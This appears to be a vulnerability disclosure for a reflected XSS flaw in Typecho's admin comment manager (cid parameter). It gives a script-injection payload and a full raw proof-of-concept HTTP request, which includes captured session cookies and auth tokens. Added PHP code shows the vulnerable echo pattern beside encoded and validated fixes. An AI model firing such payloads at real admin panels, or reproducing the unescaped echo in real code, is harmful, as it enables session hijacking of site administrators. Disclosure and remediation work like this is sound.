Typecho <= 1.2.0
Typecho admin backend comment manager with reflected-XSS vulnerability.
In /admin/manage-comments.php, the unfiltered request parameter cid is directly echoed to HTML.
POST /admin/manage-comments.php with:

```
coid[]=1&cid="><script>alert(1)</script><!--
```

The full POC request:

```
POST /cms/typecho/admin/manage-comments.php?status=wating&category=&keywords=abc&__typecho_all_posts=off&uid= HTTP/1.1
Host: 192.168.0.10
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.0.10/cms/typecho/admin/login.php?referer=http%3A%2F%2F192.168.0.10%2Fcms%2Ftypecho%2Fadmin%2Fmanage-comments.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: 745020ecd4b17dde48d43755702a78b4__typecho_uid=1; 745020ecd4b17dde48d43755702a78b4__typecho_authCode=%24T%249aGUcl7K02f405471bbdacf65892bf8ffb75bc211; PHPSESSID=m7h7isuus6cugk6mb58vdah296; u5DD_2132_saltkey=ql9191Ym; u5DD_2132_lastvisit=1677486351; u5DD_2132_seccodecSASGLE52ETX=1.1b4fba6d0be0f7dce2; u5DD_2132_ulastactivity=dd6b5bfUH2dwkFNJ5HnOvs2bnRKl16bY2TMsiYWsOsPOeru7pyMl; u5DD_2132_auth=ade9wjKb33QiAdI8RrnDloFyK4vB8ca3sx7pIgT0BNlWPo1CeA%2Bsk87ST8rZ%2FVqZTdeIhOInVMfZCF8zm7uu; u5DD_2132_lastcheckfeed=1%7C1677489964; u5DD_2132_nofavfid=1; u5DD_2132_home_diymode=1; u5DD_2132_visitedfid=2; u5DD_2132_smile=1D1; u5DD_2132_home_readfeed=1677497943; u5DD_2132_forum_lastvisit=D_2_1677498054; u5DD_2132_st_t=1%7C1677498055%7C9149ebde1ec47006277ae3faf93f0e2f; u5DD_2132_editormode_e=1; u5DD_2132_st_p=1%7C1677498095%7C926ebc78300a154f5ad9ebb023eb0b77; u5DD_2132_viewid=tid_1; u5DD_2132_seccode=5.792e3c6d8b004d4403; u5DD_2132_seccodecSE52ETX=6.a73b7daa353701b59a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

coid[]=1&cid="><script>alert(1)</script><!--
```
Reported by Srpopty, vulnerability discovered by using Corax.
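
An added example, not Typecho's code and not part of the original report: the pattern the report describes, a request parameter echoed into a quoted HTML attribute, beside two hardened forms, run against the PoC body above. The hidden-field markup, the function names, and the treatment of cid as a positive integer content ID are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for a template that echoes the parameter into a
// quoted attribute. This is not Typecho's source.
function renderUnsafe(array $post): string
{
    $cid = is_string($post['cid'] ?? null) ? $post['cid'] : '';
    return '<input type="hidden" name="cid" value="' . $cid . '">';
}

// Output encoding only: quotes and angle brackets become entities, so the
// value cannot close the attribute or open a tag.
function renderEncoded(array $post): string
{
    $cid = is_string($post['cid'] ?? null) ? $post['cid'] : '';
    $safe = htmlspecialchars($cid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="cid" value="' . $safe . '">';
}

// Validation plus encoding: assumes cid is a positive integer content ID,
// so anything else is rejected before it reaches the template.
function renderValidated(array $post): string
{
    $cid = filter_var($post['cid'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($cid === false) {
        return ''; // non-numeric, missing, or array input: render nothing
    }
    return renderEncoded(['cid' => (string) $cid]);
}

// First sample is the body from the report; the second is constructed.
$samples = [
    'report PoC body' => ['coid' => ['1'], 'cid' => '"><script>alert(1)</script><!--'],
    'constructed benign value' => ['coid' => ['1'], 'cid' => '42'],
];
foreach ($samples as $label => $post) {
    echo "== $label ==", PHP_EOL;
    echo 'unsafe:    ', renderUnsafe($post), PHP_EOL;
    echo 'encoded:   ', renderEncoded($post), PHP_EOL;
    echo 'validated: ', renderValidated($post), PHP_EOL;
}
```

Encoding at the point of output is the control that closes the reflected-XSS path; the integer check narrows what the handler accepts in the first place.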
a609b14
Merge pull request #24 from typecho/master
665320f
fix typecho#1539
Typecho <= 1.2.0 Comment Manager with Reflected-XSS Vulnerability
Influenced Version
Typecho <= 1.2.0
Description
Typecho admin backend comment manager with reflected-XSS vulnerability.
In /admin/manage-comments.php, the unfiltered request parameter cid is directly echoed to HTML.